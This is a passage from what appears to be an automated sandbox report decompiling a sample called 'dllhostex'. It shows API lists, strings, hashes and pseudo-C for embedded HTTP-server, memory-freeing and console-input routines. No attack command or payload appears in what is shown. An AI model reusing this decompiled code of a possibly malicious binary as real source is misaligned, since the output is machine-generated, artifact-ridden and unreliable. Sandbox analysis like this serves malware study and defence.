                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$HandleInformationacceptclosesocketioctlsocket
                                                • String ID: Close socket failed.$Error accepting connection: %s$Failed to set nonblocking mode on incoming connection socket: %s$Failed to set noninheritable mode on incoming connection socket.$Hit process or system resource limit at %u connections, temporarily suspending accept(). Consider setting a lower MHD_OPTION_CONNECTION_LIMIT.$Hit process or system resource limit at FIRST connection. This is really bad as there is no sane way to proceed. Will try busy waiting for system resources to become magically available.$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 2685826277-4011873036
                                                • Opcode ID: 72c1161f9beca87bc2d36cd83d3ca1bacff73e95ac1821da3bee9230dadd8203
                                                • Instruction ID: 3978ac4ac5e156a2fc8379c23713a4a73ef935b81c0d18dae620311ebcf0a566
                                                • Opcode Fuzzy Hash: 72c1161f9beca87bc2d36cd83d3ca1bacff73e95ac1821da3bee9230dadd8203
                                                • Instruction Fuzzy Hash: 89416B31A443415BE724AB3CDC44F7FBBE9AB95B1DF44062DF85A93290EB74A8448393
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0134B300 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 498sleepnetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __WSAFDIsSet.WS2_32(?,00000800), ref: 0134B469
                                                • __WSAFDIsSet.WS2_32(?,00000800), ref: 0134B604
                                                  • Part of subcall function 0134A8B0: EnterCriticalSection.KERNEL32(?,00000000,?,?,0000009C), ref: 0134A8E3
                                                • __WSAFDIsSet.WS2_32(?,00000800), ref: 0134B4E4
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B7A8
                                                • __aulldiv.LIBCMT ref: 0134B8B7
                                                • Sleep.KERNEL32(?,?,00000000,?,?,0000009C,0134C0BF), ref: 0134B926
                                                • select.WS2_32(00000000,?,?,?,00000000), ref: 0134B948
                                                • WSAGetLastError.WS2_32(?,0000009C,0134C0BF), ref: 0134B95F
                                                Strings
                                                • Could not obtain daemon fdsets, xrefs: 0134B66C
                                                • Could not add control inter-thread communication channel FD to fdset, xrefs: 0134B7CD
                                                • select failed: %s, xrefs: 0134B974
                                                • Could not add listen socket to fdset, xrefs: 0134B6B4
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterErrorLastSectionSleep__aulldivselect
                                                • String ID: Could not add control inter-thread communication channel FD to fdset$Could not add listen socket to fdset$Could not obtain daemon fdsets$select failed: %s
                                                • API String ID: 3456594406-253196239
                                                • Opcode ID: ddfae7688e35a48217f87d24c331fc0146cb07177de4916bb91595124c1dc8cf
                                                • Instruction ID: c17f6ff98c0e5e90279bc640bd7f30a32a5bb5ddbfeaccdd1854ffd551a9532e
                                                • Opcode Fuzzy Hash: ddfae7688e35a48217f87d24c331fc0146cb07177de4916bb91595124c1dc8cf
                                                • Instruction Fuzzy Hash: 0D12C5315053518BD734DE28C49476EFBE9FF8436CF180A2DEA9997299D730F9408B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0136EA6F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0136EA6F(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x13cc300) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E013656E2(_t46);
							E0136DE51( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E013656E2(_t47);
							E0136E308( *((intOrPtr*)(_t74 + 0x88)));
						}
						E013656E2( *((intOrPtr*)(_t74 + 0x7c)));
						E013656E2( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E013656E2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E013656E2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E013656E2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E013656E2( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0136EBE2( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x13cc438) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E013656E2(_t31);
							E013656E2( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe7b
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E013656E2(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E013656E2(_t74);
			}















                                                0x0136ea77
                                                0x0136ea7b
                                                0x0136ea83
                                                0x0136ea8c
                                                0x0136ea91
                                                0x0136ea98
                                                0x0136eaa0
                                                0x0136eaa8
                                                0x0136eab3
                                                0x0136eab9
                                                0x0136eaba
                                                0x0136eac2
                                                0x0136eaca
                                                0x0136ead5
                                                0x0136eadb
                                                0x0136eadf
                                                0x0136eaea
                                                0x0136eaf0
                                                0x0136ea91
                                                0x0136eaf1
                                                0x0136eaf9
                                                0x0136eb0c
                                                0x0136eb1f
                                                0x0136eb2d
                                                0x0136eb38
                                                0x0136eb3d
                                                0x0136eb46
                                                0x0136eb4e
                                                0x0136eb4f
                                                0x0136eb55
                                                0x0136eb58
                                                0x0136eb5b
                                                0x0136eb62
                                                0x0136eb64
                                                0x0136eb68
                                                0x0136eb70
                                                0x0136eb77
                                                0x0136eb7d
                                                0x0136eb7e
                                                0x0136eb7e
                                                0x0136eb85
                                                0x0136eb87
                                                0x0136eb87
                                                0x0136eb8c
                                                0x0136eb94
                                                0x0136eb99
                                                0x0136eb9a
                                                0x0136eb9a
                                                0x0136eb9d
                                                0x0136eba0
                                                0x0136eba3
                                                0x0136eba6
                                                0x0136eba6
                                                0x0136ebb8

                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 0136EAB3
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DE6E
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DE80
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DE92
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEA4
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEB6
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEC8
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEDA
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEEC
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEFE
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DF10
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DF22
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DF34
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DF46
                                                • _free.LIBCMT ref: 0136EAA8
                                                  • Part of subcall function 013656E2: HeapFree.KERNEL32(00000000,00000000,?,01363C72), ref: 013656F8
                                                  • Part of subcall function 013656E2: GetLastError.KERNEL32(?,?,01363C72), ref: 0136570A
                                                • _free.LIBCMT ref: 0136EACA
                                                • _free.LIBCMT ref: 0136EADF
                                                • _free.LIBCMT ref: 0136EAEA
                                                • _free.LIBCMT ref: 0136EB0C
                                                • _free.LIBCMT ref: 0136EB1F
                                                • _free.LIBCMT ref: 0136EB2D
                                                • _free.LIBCMT ref: 0136EB38
                                                • _free.LIBCMT ref: 0136EB70
                                                • _free.LIBCMT ref: 0136EB77
                                                • _free.LIBCMT ref: 0136EB94
                                                • _free.LIBCMT ref: 0136EBAC
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: aa859a7ed2b4aa454827c594682651d5dc7c9a302ca0117b1b5bd91149e75dfc
                                                • Instruction ID: 793af1d35e5470341c5dcb10078505aa3f615795806c3c3a3c3c71671c10d5a2
                                                • Opcode Fuzzy Hash: aa859a7ed2b4aa454827c594682651d5dc7c9a302ca0117b1b5bd91149e75dfc
                                                • Instruction Fuzzy Hash: EB315F355482069FEB219A7CEC44B5A77EEFF10368F64D439E459D7158DE70AC48CB20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0133D720 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 179keyboardfilesynchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 60%
                                                			E0133D720(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp) {
				signed int _v4;
				int _v8;
				struct _INPUT_RECORD _v24;
				long _v28;
				short _v30;
				short _v32;
				intOrPtr _v36;
				struct _INPUT_RECORD _v44;
				long _v48;
				long _v52;
				void* __esi;
				signed int _t48;
				signed int _t50;
				long _t82;
				signed char _t87;
				short _t90;
				void* _t95;
				short _t96;
				void* _t101;
				intOrPtr _t102;
				void* _t104;
				void* _t107;
				void* _t108;
				intOrPtr _t111;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t119;

				_t115 = __ebp;
				_t101 = __edi;
				_t95 = __edx;
				_t120 = _t119 - 0x34;
				_t48 =  *0x13cc074; // 0x4132269f
				_v4 = _t48 ^ _t119 - 0x00000034;
				_t107 = __ecx;
				_t87 =  *(__ecx + 0x2c) & 0xffffefff;
				_t3 = __ecx + 0x40;
				 *_t3 =  *((intOrPtr*)(__ecx + 0x40)) + 0xffffffff;
				 *(__ecx + 0x2c) = _t87;
				_t50 = _t87;
				if( *_t3 == 0 && (_t87 & 0x00000001) == 0 && (_t87 & 0x00000004) != 0) {
					_t50 = _t50 & 0xfffffffb;
					 *(__ecx + 0x2c) = _t50;
					if((_t50 & 0x00000008) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 4)) - 1;
						_t50 =  *(__ecx + 0x2c);
					}
				}
				if((_t50 & 0x00010000) == 0) {
					L24:
					_pop(_t108);
					return E01353717(_v4 ^ _t120, _t108);
				} else {
					if((_t50 & 0x02000000) == 0) {
						if((_t50 & 0x00200000) != 0) {
							goto L24;
						} else {
							_t82 = 0;
							if(WaitForSingleObject( *0x13d5b4c, 0xffffffff) != 0) {
								L25:
								E0135EBB9(_t82, _t87, _t95, _t101, _t107);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t96 =  *((short*)(_t87 + 6));
								_push(_t107);
								 *0x13cd65c =  *_t87;
								_push(_t101);
								_t102 =  *0x13cd64c; // 0xffffffff
								_t111 =  *((short*)(_t87 + 0x10)) -  *((short*)(_t87 + 0xc)) + 1;
								 *0x13cd650 = _t111;
								if(_t102 != 0xffffffff) {
									_t96 =  <  ? _t96 - _t111 + 1 : _t102;
								}
								_t90 =  *((short*)(_t87 + 2));
								if(_t111 + _t96 > _t90) {
									_t96 = _t90 - _t111;
								}
								_t97 =  <  ? 0 : _t96;
								 *0x13cd64c =  <  ? 0 : _t96;
								return 0;
							} else {
								_t87 = 0x13d5b2c;
								 *0x13d5b2c = 2;
								if( *0x13d5b2c == 1) {
									_push(_t115);
									_push(_t101);
									_t104 = CreateFileA("conout$", 0xc0000000, 3, 0, 3, 0x80, 0);
									if(_t104 != 0xffffffff && GetConsoleScreenBufferInfo(_t104, 0x13d5b30) != 0) {
										asm("lock or [eax], ebp");
									}
									_v44.EventType = 1;
									_v44.KeyEvent = 1;
									_v36 = 0xd0001;
									_v32 = MapVirtualKeyW(0xd, 0);
									_v30 = 0xd;
									_v28 = _t82;
									if(WriteConsoleInputW( *(_t107 + 0x90),  &_v44, 1,  &_v48) == 0) {
										_t82 = GetLastError();
									}
									if(_t104 != 0xffffffff) {
										CloseHandle(_t104);
									}
									if(_t82 == 0) {
										goto L23;
									} else {
										_pop(_t113);
										return E01353717(_v4 ^ _t120, _t113);
									}
								} else {
									if(ReleaseSemaphore( *0x13d5b4c, 1, 0) == 0) {
										goto L25;
									} else {
										L23:
										 *(_t107 + 0x2c) =  *(_t107 + 0x2c) | 0x00200000;
										goto L24;
									}
								}
							}
						}
					} else {
						_v8 = 0;
						asm("xorps xmm0, xmm0");
						asm("movups [esp+0x34], xmm0");
						if(WriteConsoleInputW( *(_t107 + 0x90),  &_v24, 1,  &_v52) != 0) {
							goto L24;
						} else {
							GetLastError();
							_pop(_t114);
							return E01353717(_v4 ^ _t120, _t114);
						}
					}
				}
			}































                                                0x0133d720
                                                0x0133d720
                                                0x0133d720
                                                0x0133d720
                                                0x0133d723
                                                0x0133d72a
                                                0x0133d730
                                                0x0133d735
                                                0x0133d73b
                                                0x0133d73b
                                                0x0133d73f
                                                0x0133d742
                                                0x0133d744
                                                0x0133d750
                                                0x0133d753
                                                0x0133d758
                                                0x0133d75d
                                                0x0133d760
                                                0x0133d760
                                                0x0133d758
                                                0x0133d768
                                                0x0133d8cc
                                                0x0133d8d2
                                                0x0133d8de
                                                0x0133d76e
                                                0x0133d773
                                                0x0133d7c1
                                                0x00000000
                                                0x0133d7c7
                                                0x0133d7cf
                                                0x0133d7d9
                                                0x0133d8df
                                                0x0133d8df
                                                0x0133d8e4
                                                0x0133d8e5
                                                0x0133d8e6
                                                0x0133d8e7
                                                0x0133d8e8
                                                0x0133d8e9
                                                0x0133d8ea
                                                0x0133d8eb
                                                0x0133d8ec
                                                0x0133d8ed
                                                0x0133d8ee
                                                0x0133d8ef
                                                0x0133d8f3
                                                0x0133d8f7
                                                0x0133d8fc
                                                0x0133d907
                                                0x0133d908
                                                0x0133d90e
                                                0x0133d90f
                                                0x0133d918
                                                0x0133d923
                                                0x0133d923
                                                0x0133d926
                                                0x0133d92f
                                                0x0133d933
                                                0x0133d933
                                                0x0133d93a
                                                0x0133d93d
                                                0x0133d944
                                                0x0133d7df
                                                0x0133d7e4
                                                0x0133d7e9
                                                0x0133d7ee
                                                0x0133d80c
                                                0x0133d80d
                                                0x0133d82b
                                                0x0133d835
                                                0x0133d84c
                                                0x0133d84c
                                                0x0133d84f
                                                0x0133d854
                                                0x0133d860
                                                0x0133d86e
                                                0x0133d87e
                                                0x0133d88a
                                                0x0133d896
                                                0x0133d89e
                                                0x0133d89e
                                                0x0133d8a3
                                                0x0133d8a6
                                                0x0133d8a6
                                                0x0133d8b0
                                                0x00000000
                                                0x0133d8b2
                                                0x0133d8b2
                                                0x0133d8c4
                                                0x0133d8c4
                                                0x0133d7f0
                                                0x0133d801
                                                0x00000000
                                                0x0133d807
                                                0x0133d8c5
                                                0x0133d8c5
                                                0x00000000
                                                0x0133d8c5
                                                0x0133d801
                                                0x0133d7ee
                                                0x0133d7d9
                                                0x0133d775
                                                0x0133d779
                                                0x0133d788
                                                0x0133d792
                                                0x0133d79f
                                                0x00000000
                                                0x0133d7a5
                                                0x0133d7a5
                                                0x0133d7ab
                                                0x0133d7bb
                                                0x0133d7bb
                                                0x0133d79f
                                                0x0133d773

                                                APIs
                                                • WriteConsoleInputW.KERNEL32(?,?,00000001,000000FF), ref: 0133D797
                                                • GetLastError.KERNEL32 ref: 0133D7A5
                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 0133D7D1
                                                • ReleaseSemaphore.KERNEL32(00000001,00000000), ref: 0133D7F9
                                                • CreateFileA.KERNEL32(conout$,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0133D825
                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,013D5B30), ref: 0133D83D
                                                • MapVirtualKeyW.USER32 ref: 0133D868
                                                • WriteConsoleInputW.KERNEL32(?,?,00000001,00000000), ref: 0133D88E
                                                • GetLastError.KERNEL32 ref: 0133D898
                                                • CloseHandle.KERNEL32(00000000), ref: 0133D8A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$ErrorInputLastWrite$BufferCloseCreateFileHandleInfoObjectReleaseScreenSemaphoreSingleVirtualWait
                                                • String ID: conout$
                                                • API String ID: 912171342-3200116840
                                                • Opcode ID: 70ce1d40c3802b4893d09f127338f6aa2de42cfa75d3af318f29af94d7eb6ca2
                                                • Instruction ID: 7e44a9628df5388d9a23da2aa94d32da1d11d726f0a36d68fcfbfb00edeb268c
                                                • Opcode Fuzzy Hash: 70ce1d40c3802b4893d09f127338f6aa2de42cfa75d3af318f29af94d7eb6ca2
                                                • Instruction Fuzzy Hash: 7151F0316007009FE7219F7DE884B6ABBE8FF88B18F90462DF95AC6295E771E441CB45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01350430 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 99COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTickCount64.KERNEL32 ref: 0135045B
                                                • __aulldiv.LIBCMT ref: 01350476
                                                • EnterCriticalSection.KERNEL32(0000009C,-013D5CE0,?,000003E8,00000000), ref: 013504C2
                                                • LeaveCriticalSection.KERNEL32(0000009C,?,000003E8,00000000), ref: 01350531
                                                • LeaveCriticalSection.KERNEL32(0000009C,?,000003E8,00000000), ref: 01350545
                                                Strings
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 013504EF
                                                • (NULL != (connection)->prevX) || ((connection) == (daemon->normal_timeout_head)), xrefs: 013504E0
                                                • (NULL != (connection)->nextX) || ((connection) == (daemon->normal_timeout_tail)), xrefs: 0135054F
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 013504EA
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c, xrefs: 01350559
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0135055E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Leave$Count64EnterTick__aulldiv
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (connection)->nextX) || ((connection) == (daemon->normal_timeout_tail))$(NULL != (connection)->prevX) || ((connection) == (daemon->normal_timeout_head))$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\connection.c
                                                • API String ID: 2141774753-1959953275
                                                • Opcode ID: 033cf0c697c3167517b665f8469a982d1088814ac96e4b8ac1a849b9a38426a3
                                                • Instruction ID: bed2291fe1625710d8f12417c0bb7aba9262dc9444fbf3b79bf0f8b36c0f6018
                                                • Opcode Fuzzy Hash: 033cf0c697c3167517b665f8469a982d1088814ac96e4b8ac1a849b9a38426a3
                                                • Instruction Fuzzy Hash: EA3193B1A00702EFE768DF79D445F56B7E8BB04B18F00891DF95E97A41D771B0448BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01351EF0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 188COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E01351EF0(void* __ecx) {
				void* __ebp;
				intOrPtr* _t29;
				char* _t33;
				intOrPtr _t35;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				char* _t54;
				void* _t57;
				char* _t58;
				char* _t61;
				intOrPtr _t62;
				char* _t65;
				intOrPtr _t66;
				intOrPtr* _t71;
				char* _t73;
				char* _t85;
				void* _t86;
				intOrPtr _t88;
				void* _t90;
				char* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t98;

				_t71 =  *((intOrPtr*)(_t93 + 0x18));
				_t92 = __ecx;
				_t91 =  *((intOrPtr*)(_t93 + 0x18));
				 *_t71 = 0;
				_t29 = __ecx + 0x10;
				 *((intOrPtr*)(_t93 + 0x10)) = _t29;
				 *((intOrPtr*)(_t93 + 0xc)) =  *_t29;
				if(_t91 == 0) {
					L21:
					return 1;
				} else {
					while( *_t91 != 0) {
						_t85 = E013551C0(_t91, 0x3d);
						_t33 = E013551C0(_t91, 0x26);
						_t94 = _t93 + 0x10;
						if(_t33 == 0) {
							_t73 = _t91;
							if(_t85 != 0) {
								 *_t85 = 0;
								_t86 = _t85 + 1;
								E01351EC0(_t73);
								_t35 =  *((intOrPtr*)(_t94 + 0x10));
								 *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x50))))( *((intOrPtr*)(_t35 + 0x54)), _t92, _t91);
								E01351EC0(_t86);
								_t39 =  *((intOrPtr*)(_t94 + 0x1c));
								 *((intOrPtr*)( *((intOrPtr*)(_t39 + 0x50))))( *((intOrPtr*)(_t39 + 0x54)), _t92, _t86);
								_t42 = E0134DC30(_t92, 8, _t91, _t86);
								_t95 = _t94 + 0x20;
								if(_t42 != 0) {
									goto L20;
								} else {
									goto L23;
								}
							} else {
								E01351EC0(_t73);
								_t49 =  *((intOrPtr*)(_t94 + 0x10));
								 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x50))))( *((intOrPtr*)(_t49 + 0x54)), _t92, _t91);
								_t21 = _t85 + 8; // 0x8
								_t52 = E0134DC30(_t92, _t21, _t91, _t85);
								_t95 = _t94 + 0x14;
								if(_t52 == 0) {
									goto L23;
								} else {
									L20:
									 *_t71 =  *_t71 + 1;
									goto L21;
								}
							}
						} else {
							 *_t33 = 0;
							_t53 = _t33 + 1;
							 *((intOrPtr*)(_t94 + 0x24)) = _t53;
							if(_t85 == 0 || _t85 >= _t53) {
								_t54 = E013551C0(_t91, 0x2b);
								_t97 = _t94 + 8;
								while(_t54 != 0) {
									 *_t54 = 0x20;
									_t54 = E013551C0(_t54 + 1, 0x2b);
									_t97 = _t97 + 8;
								}
								_t88 =  *((intOrPtr*)(_t97 + 0x10));
								 *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x50))))( *((intOrPtr*)(_t88 + 0x54)), _t92, _t91);
								_push(0);
							} else {
								 *_t85 = 0;
								_t90 = _t85 + 1;
								_t61 = E013551C0(_t91, 0x2b);
								_t98 = _t94 + 8;
								while(_t61 != 0) {
									 *_t61 = 0x20;
									_t61 = E013551C0(_t61 + 1, 0x2b);
									_t98 = _t98 + 8;
								}
								_t62 =  *((intOrPtr*)(_t98 + 0x10));
								 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x50))))( *((intOrPtr*)(_t62 + 0x54)), _t92, _t91);
								_t65 = E013551C0(_t90, 0x2b);
								_t97 = _t98 + 0x14;
								while(_t65 != 0) {
									 *_t65 = 0x20;
									_t65 = E013551C0(_t65 + 1, 0x2b);
									_t97 = _t97 + 8;
								}
								_t66 =  *((intOrPtr*)(_t97 + 0x10));
								 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x50))))( *((intOrPtr*)(_t66 + 0x54)), _t92, _t90);
								_push(_t90);
							}
							_push(_t91);
							_t57 = E0134DC30(_t92, 8);
							_t95 = _t97 + 0x14;
							if(_t57 == 0) {
								L23:
								_push("Not enough memory in pool to allocate header record!\n");
								_push( *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x14)))));
								E01351E90();
								_push("<html><head><title>Request too big</title></head><body>Your HTTP header was too big for the memory constraints of this webserver.</body></html>");
								E0134F230(0x1af);
								return 0;
							} else {
								_t58 =  *((intOrPtr*)(_t95 + 0x24));
								_t91 = _t58;
								 *_t71 =  *_t71 + 1;
								if(_t58 != 0) {
									continue;
								} else {
									return _t91 + 1;
								}
							}
						}
						goto L24;
					}
					goto L21;
				}
				L24:
			}
































                                                0x01351ef4
                                                0x01351ef9
                                                0x01351efc
                                                0x01351f00
                                                0x01351f06
                                                0x01351f09
                                                0x01351f0f
                                                0x01351f16
                                                0x01352057
                                                0x01352063
                                                0x01351f20
                                                0x01351f20
                                                0x01351f34
                                                0x01351f36
                                                0x01351f3b
                                                0x01351f40
                                                0x01352029
                                                0x0135202d
                                                0x01352064
                                                0x01352067
                                                0x01352068
                                                0x0135206d
                                                0x01352079
                                                0x0135207d
                                                0x01352082
                                                0x0135208e
                                                0x01352099
                                                0x0135209e
                                                0x013520a3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0135202f
                                                0x0135202f
                                                0x01352034
                                                0x01352040
                                                0x01352044
                                                0x01352049
                                                0x0135204e
                                                0x01352053
                                                0x00000000
                                                0x01352055
                                                0x01352055
                                                0x01352055
                                                0x00000000
                                                0x01352055
                                                0x01352053
                                                0x01351f46
                                                0x01351f46
                                                0x01351f49
                                                0x01351f4a
                                                0x01351f50
                                                0x01351fc7
                                                0x01351fcc
                                                0x01351fd1
                                                0x01351fd3
                                                0x01351fda
                                                0x01351fdf
                                                0x01351fe2
                                                0x01351fe6
                                                0x01351ff2
                                                0x01351ff4
                                                0x01351f56
